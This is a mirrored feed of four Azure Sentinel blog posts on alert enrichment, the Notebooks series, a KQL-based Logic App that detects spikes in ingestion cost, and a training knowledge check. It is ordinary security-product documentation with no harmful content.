https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/alert-enrichment-quot-how-to-reduce-incident-triage-and/ba-p/2687271 <P>In this blog post we will explore the new “Alert enrichment” in Azure Sentinel Analytics and do a deep dive into the "Alert details" dynamic content ability.</P> <P>&nbsp;</P> <P>The “Alert enrichment” abilities are constructed of 3 parts:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_1-1629972572693.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305979i10D4FC806367D210/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_1-1629972572693.png" alt="romarsia_1-1629972572693.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>1.&nbsp;</STRONG><A href="#" target="_blank" rel="noopener"><STRONG>Entity mapping:</STRONG> </A>Entity mapping is an integral part of the&nbsp;<A href="#" target="_self">scheduled query analytics rules</A>&nbsp;configuration. It enriches the rules' output (alerts and incidents) with essential information that serves as the building blocks for any investigation processes and remediation actions that would follow.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_5-1629972828904.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305983iC0AE57845F3D80AA/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_5-1629972828904.png" alt="romarsia_5-1629972828904.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>2. <A href="#" target="_blank" rel="noopener">Custom details</A>:</STRONG> Using the custom details feature in the analytics rule wizard, you can surface event data in the alerts that are constructed from those events, making the event data part of the alert properties. In effect, this gives you immediate event content visibility in your incidents, enabling you to triage, investigate, draw conclusions, and respond with much greater speed and efficiency.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_2-1629972633807.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305980iF3411156A432AB39/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_2-1629972633807.png" alt="romarsia_2-1629972633807.png" /></span></P> <P class="lia-indent-padding-left-60px"><STRONG><SPAN>Accessing custom details:</SPAN></STRONG></P> <P class="lia-indent-padding-left-90px"><STRONG>i. Alert:</STRONG> you can access the custom details from the alert by reviewing the extended properties.</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_3-1629972717334.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305981iDD8AE2BBA94966D6/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_3-1629972717334.png" alt="romarsia_3-1629972717334.png" /></span></P> <P class="lia-indent-padding-left-90px"><STRONG>ii. Incident:</STRONG> on the incident timeline you can see all the alerts related to this incident. Each alert has its own custom details which are visible when we open the alert in the entity timeline view.</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_4-1629972763474.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305982iB2A59556BCC574D6/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_4-1629972763474.png" alt="romarsia_4-1629972763474.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>3.&nbsp;</STRONG><A href="#" target="_blank" rel="noopener"><STRONG> Alert details:</STRONG></A> With the alert details feature, you can customize the alert's appearance and content. Here you can select parameters in your alert that can be represented in the name or description of each instance of the alert, or that can contain the tactics and severity assigned to that instance of the alert. If the selected parameter has no value (or an invalid value in the case of tactics and severity), the alert details will revert to the defaults specified in the first page of the wizard.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_6-1629972885888.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305984i45410C7065D735A2/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_6-1629972885888.png" alt="romarsia_6-1629972885888.png" /></span></P> <P>As you can probably tell for yourself, we are going to take a deep dive into the “Alert details” dynamic content.</P> <P>&nbsp;</P> <P><STRONG>Why “Alert details” dynamic content?</STRONG> <BR />Generally, the purpose of “alert enrichment” is to allow customization of the Alert created from the detection.<BR />The main goal is to reduce the time it takes to the analyst to triage and handle the incident.&nbsp;The same applies for “Alert details” dynamic content.<BR />In Azure Sentinel when you create a detection (an analytics rule), the rule name (and the description, MITRE tactics and severity) will populate the alerts created from that rule.<BR />Now let’s try and examine the following case study to see how we can leverage the “Alert details” dynamic content for better investigation and incident handling.</P> <P>&nbsp;</P> <P><STRONG><SPAN>Case study – “Multiple Teams deleted by a single user”.</SPAN></STRONG></P> <P><SPAN>Let’s take a look at the following <A href="#" target="_blank" rel="noopener">detection</A>. </SPAN></P> <P><SPAN>This is a out-of-the-box content provided by Azure Sentinel.</SPAN></P> <P>In this detection we are trying to spot a single user who deleted multiple groups within an hour.<BR />As you can see the severity of such a detection is set to “low” which makes sense as this action by itself is not highly important.<BR />Now assuming that the user who performed these actions is an Admin in the organization, we might want to raise the severity since this might indicate that the account has been compromised.</P> <P><SPAN>&nbsp;</SPAN></P> <P><STRONG><SPAN>What are we going to do?</SPAN></STRONG></P> <P><SPAN>We’ll create a watchlist in which we will store all these high-profile/risk accounts.&nbsp;</SPAN></P> <P><SPAN>This list will be accessed later on by the rule.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_7-1629973014456.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305985i2898988248FD6585/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_7-1629973014456.png" alt="romarsia_7-1629973014456.png" /></span></P> <P><STRONG><SPAN>Note:</SPAN></STRONG><SPAN> we can also use the </SPAN><SPAN><A href="#" target="_blank" rel="noopener">watchlist templates</A>, each built-in watchlist template has its own set of data listed in the CSV file attached to the template.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_8-1629973052586.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305986iB01DD4B7177D944C/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_8-1629973052586.png" alt="romarsia_8-1629973052586.png" /></span></P> <P>Now we can create our rule from the template:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_14-1629973788456.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305995iE82D1DA1E20F3A14/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_14-1629973788456.png" alt="romarsia_14-1629973788456.png" /></span></P> <P>When creating the rule, we are going to customizing the query in order to create incidents with different values according to the user who performed the action.<BR />What we are used to do with multiple rules we are going to do with just one.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_10-1629973179981.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305989iFF143ED065B66490/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_10-1629973179981.png" alt="romarsia_10-1629973179981.png" /></span></P> <P>Each event will have a column called “Severity”, which will be set according to the user who performed the action.<BR />Now we can make the magic happen!<BR />By using “Alert details” dynamic content, we can set the alert severity (and the corresponding incident) to dynamically change according to the value of the column.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_11-1629973212833.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305990i750C045F68913E18/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_11-1629973212833.png" alt="romarsia_11-1629973212833.png" /></span></P> <P>This means when a user from the watchlist will delete 3 or more groups a high severity alert and incident will be created.</P> <P>&nbsp;</P> <P><STRONG>But we want more!</STRONG></P> <P><BR />After having these 2 types of incidents created from this rule, we can improve the incidents even more.<BR />The first thing that an analyst will do with a high-severity incident received from this rule is to ask himself – “Which user from the list performed this action?”<BR />To get a quick answer we can take 2 approaches:</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG><SPAN>#1 – the custom details approach: </SPAN></STRONG></P> <P class="lia-indent-padding-left-30px"><SPAN>Using the custom details feature in the Analytics Rule wizard, you can surface event data in the alerts that are constructed from those events, making the event data part of the alert properties. In effect, this gives you immediate event content visibility in your incidents, enabling you to triage, investigate, draw conclusions, and respond faster and more efficient.&nbsp;</SPAN></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_12-1629973273421.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305992iEC950230DEED0D5F/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_12-1629973273421.png" alt="romarsia_12-1629973273421.png" /></span></P> <P class="lia-indent-padding-left-30px">The only downside to this approach is that an analyst must enter the incident to understand which user performed this action.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG>#2 – dynamic name approach:</STRONG><BR />In the Alert Name Format field, enter the text you want to appear as the name of the alert (the alert text), and include, in double curly brackets, any parameters you want to be part of the alert text.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="romarsia_13-1629973344719.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305993i713F40B0461F00F2/image-size/large?v=v2&amp;px=999" role="button" title="romarsia_13-1629973344719.png" alt="romarsia_13-1629973344719.png" /></span></P> <P class="lia-indent-padding-left-30px">This setting means that the display name of the alert (and incident) will change according to the user who caused this alert trigger.<BR />An analyst reviewing the incident could instantly tell which user is involved and eventually improve the MTTR.<BR />We also changed the description to be dynamically set according to the actual content of events.</P> <P>&nbsp;</P> <P>As you can see the alert enrichment really opens a variety of new abilities:</P> <P class="lia-indent-padding-left-30px">• Changing the severity according to the number of results (or based on historical data)<BR />• Leverage the HTML &amp; markdown support on the incident to create richer and more accurate description for the incident <BR />• Change the title according to the user who performed the action <BR />And much more!</P> <P>The goal here is to immediately improve your detections, reduce the number of rules, and result in shorter MTTR.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 01 Sep 2021 07:36:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/alert-enrichment-quot-how-to-reduce-incident-triage-and/ba-p/2687271 romarsia 2021-09-01T07:36:34Z Becoming an Azure Sentinel Notebooks ninja - the series! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/becoming-an-azure-sentinel-notebooks-ninja-the-series/ba-p/2693491 <P>Hi, all!</P> <P>&nbsp;</P> <P>Welcome to a new series on Azure Sentinel Notebooks!&nbsp; In this post, we want to introduce everyone to the Notebooks feature of Azure Sentinel and provide some basic knowledge that we’ll build on throughout this series.</P> <P>&nbsp;</P> <P>The series will take the following form:</P> <P>&nbsp;</P> <UL> <LI><STRONG>Part 1:</STRONG> What are notebooks and when do you need them? – <STRONG><EM>this post</EM></STRONG></LI> <LI><STRONG>Part 2:</STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661" target="_self">How to get started with notebooks and tour of the features</A></LI> <LI><STRONG>Part 3:</STRONG> <A href="#" target="_blank" rel="noopener">Overview of the pre-built notebooks and how to use them</A></LI> <LI><STRONG>Part 4:</STRONG> How to create your own notebooks from scratch and how to customize the existing ones</LI> </UL> <P>The diagram below demonstrates a structured learning pathway for you to become an Azure Sentinel Notebooks ninja and&nbsp;<SPAN>earn a Ninja certificate</SPAN>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Notebook ninja training series.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309074i5C2F9928DC9A682D/image-size/large?v=v2&amp;px=999" role="button" title="Notebook ninja training series.png" alt="Notebook ninja training series.png" /></span></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>What are notebooks and when to use them?</STRONG></FONT></P> <P>&nbsp;</P> <P>We have a number of features built into Azure Sentinel that share the “<EM>books</EM>” nomenclature, i.e., Play<EM>books</EM>, Work<EM>books</EM>, and Note<EM>books</EM> – so it can be confusing at times.</P> <P>&nbsp;</P> <P>Playbooks, of course, are based on Azure Logic Apps and supply some of the automation capabilities for Azure Sentinel. Workbooks are provided for analysts and SOC managers to build interactive views and reports of the Azure Sentinel data.</P> <P>&nbsp;</P> <P>Notebooks should be an integral part of the security team’s daily processes, particularly those security teams using Azure Sentinel as their SIEM of choice.</P> <P>&nbsp;</P> <P>The Notebooks feature in Azure Sentinel is built on <EM>Jupyter Notebooks</EM> which is an open-source web application that allows anyone to create and share documents that contain live code, equations, visualizations, and narrative text. Its name is derived from the scripting language it is based on: <STRONG>JU</STRONG>lia, <STRONG>PYT</STRONG>hon, and <STRONG>R</STRONG>.</P> <P>&nbsp;</P> <P>The Jupyter Notebooks service has gained its popularity in various data science and scientific computing communities such as Genome research, Astronomy, finance, and stock market predictions, among others. It's effective and reliable proficiency to dynamically parse and present data enabled a logical pathway of interest to the cybersecurity field and has increasingly become a key tool for cybersecurity operations.</P> <P>&nbsp;</P> <P>In <A href="#" target="_blank" rel="noopener">Why Use Jupyter for Security Investigations?</A>, <LI-USER uid="313718"></LI-USER>&nbsp;&nbsp;provides some great context for using Jupyter Notebooks for cybersecurity operations including the capability for accessing and including external data, providing a true scripting and programming environment, and providing a set of steps that are restartable and repeatable.</P> <P>&nbsp;</P> <P>Think of a notebook like OneNote on steroids. Just like OneNote, you can store valuable information like text and pictures, but in the case of notebooks, that data is interactive.</P> <P>&nbsp;</P> <P>In short…</P> <UL> <LI><STRONG>Notebooks can be artifact storage</STRONG> – data persistence, repeatability and backtracking allows analysts to collect and store evidence and collateral to improve response the next time a similar event occurs.</LI> <LI><STRONG>Notebooks can be interactive</STRONG> – storing more than just pieces of information, notebooks can process the scripts it stores and produce data results inline to be used to build a more efficient and more intelligent approach to investigations and hunting.</LI> <LI><STRONG>Notebooks can be interoperable</STRONG> – Notebooks enable deeper programmatic abilities to connect to, store, and use external data to be used dynamically.</LI> <LI><STRONG>Notebooks can be guides</STRONG> – through sophisticated data processing, machine learning, and visualization, notebooks guide analysts through every step of an investigation or hunt to expose, mitigate, and remediate threats to the environment.</LI> </UL> <P>&nbsp;</P> <P>Notebooks in Azure Sentinel extend the capabilities of the overall product. Out-of-the-box, every Azure Sentinel instance comes with several ready-made notebooks that provide use cases for things like:</P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Scanning for credential leaks in your database environment</A></LI> <LI><A href="#" target="_self">Detecting malicious base64-encoded commands on Linux hosts</A></LI> <LI><A href="#" target="_blank" rel="noopener">Generating baselines in network activities</A></LI> </UL> <P>&nbsp;</P> <P>To have a better understanding of who needs to use which “<EM>book</EM>” and when, the following table breaks these areas down side-by-side per suggested role along with providing the uses and pros and cons for each.</P> <TABLE> <TBODY> <TR> <TD width="167">&nbsp;</TD> <TD width="303"> <P class="lia-align-center"><FONT size="4"><STRONG>Playbooks</STRONG></FONT></P> </TD> <TD width="311"> <P class="lia-align-center"><FONT size="4"><STRONG>Workbooks</STRONG></FONT></P> </TD> <TD width="415"> <P class="lia-align-center"><FONT size="4"><STRONG>Notebooks</STRONG></FONT></P> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Roles</STRONG></FONT></P> </TD> <TD width="303"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC engineers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Analysts of all tiers</P> </TD> <TD width="311"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC engineers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Analysts of all tiers</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SOC managers</P> </TD> <TD width="415"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Threat hunters/Tier 2-3 analysts</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Incident investigators</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Cyber data scientists</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Security researchers</P> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Uses</STRONG></FONT></P> </TD> <TD width="303"> <P>Automation of simpler, repeatable tasks:</P> <UL class="lia-list-style-type-square"> <LI>Ingestion – bring in external data</LI> <LI>Enrichment (TI, GeoIP lookups, etc.)</LI> <LI>Investigation</LI> <LI>Remediation</LI> </UL> </TD> <TD width="311"> <UL class="lia-list-style-type-square"> <LI>Visualization</LI> </UL> </TD> <TD width="415"> <UL class="lia-list-style-type-square"> <LI><FONT color="#0000FF">Querying Azure Sentinel &amp; external data&nbsp;</FONT></LI> <LI><FONT color="#0000FF">Enrichment (TI, GeoIP, WhoIs lookups, etc.)</FONT></LI> <LI><FONT color="#0000FF">Investigation</FONT></LI> <LI><FONT color="#0000FF">Visualization</FONT></LI> <LI><FONT color="#0000FF">Hunting</FONT></LI> <LI><FONT color="#0000FF">Machine Learning &amp; big data analytics</FONT></LI> </UL> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Pros</STRONG></FONT></P> </TD> <TD width="303"> <UL class="lia-list-style-type-circle"> <LI>Best for single, repeatable tasks</LI> <LI>No coding knowledge required</LI> </UL> </TD> <TD width="311"> <UL class="lia-list-style-type-circle"> <LI>Best for high-level view of Sentinel data</LI> <LI>No coding knowledge required</LI> </UL> </TD> <TD width="415"> <UL class="lia-list-style-type-circle"> <LI><FONT color="#0000FF">Best for more complex chain of repeatable tasks</FONT></LI> <LI><FONT color="#0000FF">Ad-hoc, more procedural control – easy to pivot due to the interactive characteristics and the use of Python, a procedural language</FONT></LI> <LI><FONT color="#0000FF">Rich Python libraries for data manipulation &amp; visualization options</FONT></LI> <LI><FONT color="#0000FF">Machine Learning &amp; custom analysis</FONT></LI> <LI><FONT color="#0000FF">Easy to document &amp; share analysis evidence</FONT></LI> </UL> </TD> </TR> <TR> <TD width="167"> <P><FONT size="4"><STRONG>Cons</STRONG></FONT></P> </TD> <TD width="303"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Not suitable for ad-hoc &amp; complex chain of tasks</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Not great for documenting &amp; sharing evidence</P> </TD> <TD width="311"> <P>•&nbsp; &nbsp;Cannot integrate with external data</P> </TD> <TD width="415"> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Higher learning curve - requires coding knowledge *</P> <P>•&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775" target="_blank" rel="noopener">Limited automated execution</A> (automation capabilities should be improved in the near future)</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>* Anyone can use our built-in notebooks without coding knowledge. But the additional skillsets are involved in taking notebooks to an advanced level. This is one of the reasons for the effort behind this Azure Sentinel Notebook Ninja series, but also a big reason for an upcoming public-facing, <STRONG>free training series for Azure Sentinel Notebooks</STRONG>.</P> <P>&nbsp;</P> <P>To register visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</P> <P>&nbsp;</P> <P>We are super-excited to be bringing this series (and the training) to you! Look for more great knowledge on Azure Sentinel Notebooks as we supply new installments of this series.</P> <P>&nbsp;</P> <P>Additionally, we've launched a brand new email DL specifically for Azure Sentinel Notebooks: <A href="https://gorovian.000webhostapp.com/?exam=mailto:asinotebooks@service.microsoft.com" target="_blank" rel="noopener">asinotebooks@service.microsoft.com</A>.&nbsp;This DL is monitored by various product teams and is intended to be used to collect and respond to questions, issues, and feedback.</P> <P>&nbsp;</P> <P>Stay tuned!</P> <P>&nbsp;</P> <P>More reading/tutorial resources:</P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/why-use-jupyter-for-security-investigations/ba-p/475729" target="_blank" rel="noopener">Blog: Why Jupyter notebooks are a key tool to SecOps</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: How to get started - Azure Sentinel notebooks</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: Software-defined monitoring - Using automated notebooks and Azure Sentinel to improve SecOps</A></LI> <LI><A href="#" target="_blank" rel="noopener">Webinar: Customizing Azure Sentinel with Python - MSTICPy and Jupyter Notebooks</A></LI> <LI><A href="#" target="_blank" rel="noopener">Notebook examples on the Azure Sentinel GitHub Repository</A></LI> <LI><A href="#" target="_blank" rel="noopener">Project Jupyter</A></LI> <LI><A href="#" target="_blank" rel="noopener nofollow noreferrer">Azure Sentinel Weekly Newsletter</A></LI> </UL> <P>&nbsp;</P> <P>Special thanks to my dear colleague,&nbsp;<LI-USER uid="324945"></LI-USER>,&nbsp;for his major collaboration on this blog series and drafting this post!</P> <P>&nbsp;</P> <P>&nbsp;</P> Tue, 12 Oct 2021 01:55:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/becoming-an-azure-sentinel-notebooks-ninja-the-series/ba-p/2693491 Chi_Nguyen 2021-10-12T01:55:38Z Ingestion Cost Spike detection Playbook https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-spike-detection-playbook/ba-p/2591301 <P><FONT size="5"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="IngestionSpike.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306893iC006CDF4F0F90C02/image-size/large?v=v2&amp;px=999" role="button" title="IngestionSpike.png" alt="IngestionSpike.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="3">Azure Sentinel is a modern SIEM solution offering cloud scale analytics to power your thereat detection and response requirements. Like most cloud solutions, the billing for Azure Sentinel is largely based on a pay-per-use model. Specifically for Azure Sentinel, billing is based on the amount of data ingested into Log Analytics and Azure Sentinel. To ensure that you have continuous visibility should the amount of billable data ingested into the platform experience an unexpected spike, we have developed this Logic App to address exactly this sort of scenario.</FONT></P> <P><FONT size="3">This ingestion cost spike alert logic app is based on the principle of anomaly detection and as such utilizes the built-in KQL function <A href="#" target="_blank" rel="noopener"><STRONG>series_decompose_anomalies().</STRONG></A> It compares the baseline/expected level of ingestion over a period of time and then uses that historical pattern to determine whether to alert on a sudden increase of billable data into the workspace. Below is an image depicting the various actions the Logic App steps through, followed by a detailed explanation of the key parts of the query that checks for anomalies based on the historical ingestion pattern. The Logic App is triggered on a recurring schedule. Since you probably want to be immediately notified when this type of anomaly occurs then you may want to run it on a daily basis.</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="LogicAppOverview.png" style="width: 569px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298693iC440BCB0645988A2/image-size/large?v=v2&amp;px=999" role="button" title="LogicAppOverview.png" alt="Image of Logic App overview" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Image of Logic App overview</span></span></P> <P>&nbsp;</P> <LI-CODE lang="applescript">let UpperThreshold = UpperAnomalyThreshold; //+3 is the suggested number and it indicates a strong anomaly though you can modify it : Outlier - Wikipedia Usage | where IsBillable == "true" //we are only interested in tables getting notified when a spike is detected in a billable table | where Quantity &gt; ReportingQty //Allows you to report only on variations that are above a certain threshold that you deem significant enough to warrant an alert | make-series Qty=sum(Quantity) on TimeGenerated from ago((LookBack)d) to now() step 1d by DataType //creates a time series to look at the ingestion pattern over the period defined in the LookBack variable | extend (anomalies, score, baseline) = series_decompose_anomalies(Qty, 1.5, 7, 'linefit', 1, 'ctukey', 0.01) //takes the time series of ingested data across the days specified in the ‘LookBack’ variable and extract anomalous points with scores based on predicted values using the linear regression concept. See https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/series-decompose-anomaliesfunction for a detailed explanation of each argument. For an explanation of 'ctukey' read: Outlier - Wikipedia. | where anomalies[-1] == 1 or anomalies[-1] == -1 //the output of series_decompose_anomalies function is three things: A ternary (as opposed to binary) series containing (+1, -1, 0) marking up/down/no anomaly respectively, the Anomaly score and the predicted value or baseline. | extend Score = score[-1] //this part picks up the anomaly state from the most recent run. -1 indicates a position in the array. | where Score &gt;= UpperAnomalyThreshold //compare with strong anomaly indicator values extracted from the time series data | extend PercentageQtyIncrease = ((round(todouble(Qty[-1]),0)-round(todouble(baseline[-1]),1))/round(todouble(Qty[-1]),0) * 100) //calculates percentage increase to present data in percent terms for easier appreciation of the anomaly | project DataType,ExpectedQty=round(todouble(baseline[-1]),0), ActualQty=round(todouble(Qty[-1]),0),round(PercentageQtyIncrease,0) | order by round(todouble(PercentageQtyIncrease),0) desc | where PercentageQtyIncrease &gt; PercentIncrease //only alert if the percentage increase exceeds the threshold beyond which you specified that you wish to be notified </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="3"><STRONG>Note:</STRONG> This logic app is complementary to the previously released <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-alert-playbook/ba-p/2006003" target="_blank" rel="noopener">Ingestion Cost Alert App</A> but different in function. The Ingestion Cost Alert App is designed to send you alerts if the budget you define is exceeded. In contrast, the Ingestion Cost Anomaly App is designed to alert you, should there be an unusual spike in the billable data being ingested into the Log Analytics workspace where you have deployed Azure Sentinel. The App provides you with the flexibility to determine two thresholds around which the alerting should occur:</FONT></P> <OL> <LI><FONT size="3">The minimum increase in the amount of data in Gigabytes around which alerting should occur. This allows you to suppress alerts triggered by increases you consider immaterial</FONT></LI> <LI><FONT size="3">The percentage increase in data. This parameter gives you additional flexibility to manage alerting thresholds by specifying what percentage increase you consider worth triggering the anomaly alert on.</FONT></LI> </OL> <P><FONT size="3">To deploy the Ingestion Cost Anomaly App, follow this <A href="#" target="_blank" rel="noopener">link</A> to our GitHub repo. As part of the deployment process, you will need to specify some parameters in the “project details” page that determine the sensitivity of the App in terms of how it responds to ingestion anomalies, as well as define additional settings specific to your environment. See below highlighting the various parameters needed in this form:</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="LogicAppParameters.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298694iEFDA648997319F5C/image-size/large?v=v2&amp;px=999" role="button" title="LogicAppParameters.png" alt="LogicAppParameters.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">Upon a successful run of the logic app and should there be a billable data ingestion spike in your workspace than an e-mail with contents similar to the below will be sent out to the designated recipients&nbsp;:</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="SampleOutput.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298695iDFC84B7CB11F7002/image-size/large?v=v2&amp;px=999" role="button" title="SampleOutput.png" alt="SampleOutput.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">Related resources:</FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Series_decompose_anomalies() - Azure Data Explorer | Microsoft Docs</A></FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Cost Management in Azure Sentinel - Webinar</A></FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Azure Sentinel pricing</A></FONT></P> <P><FONT size="3"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-alert-playbook/ba-p/2006003" target="_blank" rel="noopener">Ingestion Cost Alert Playbook - Microsoft Tech Community</A></FONT></P> <P>&nbsp;</P> <P><FONT size="3"><EM>Special thanks to <LI-USER uid="215052"></LI-USER>&nbsp;, <LI-USER uid="329567"></LI-USER>&nbsp;and <LI-USER uid="66621"></LI-USER>&nbsp;for their collaboration</EM></FONT></P> <P>&nbsp;</P> Wed, 01 Sep 2021 19:04:54 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-spike-detection-playbook/ba-p/2591301 Inwafula 2021-09-01T19:04:54Z What's new: Azure Sentinel Ninja Training Knowledge Check https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-ninja-training-knowledge-check/ba-p/2677696 <P>Announcing the Azure Sentinel Ninja Training knowledge check! Think you're a true Sentinel Ninja? Take the knowledge check and find out. If you pass the knowledge check with a score of over 80% you can request a certificate to prove your ninja skills!</P> <P>&nbsp;</P> <P>1. Take the knowledge check<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener">here.</A>&nbsp;</P> <P>2. If you score 80% or more in the knowledge check, request your participation certificate<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener noreferrer">here</A>. If you achieved less than 80%, please review the questions that you got it wrong, study more and take the assessment again.</P> <P>&nbsp;</P> <P><EM>Note: it can take up to one business day for you to receive your certificate via email.</EM></P> <P>&nbsp;</P> <P>The Azure Sentinel Ninja training forms the basis of the skills and knowledge tested in this exercise which can accessed&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/become-an-azure-sentinel-ninja-the-complete-level-400-training/ba-p/1246310" target="_blank" rel="noopener">here</A>.</P> 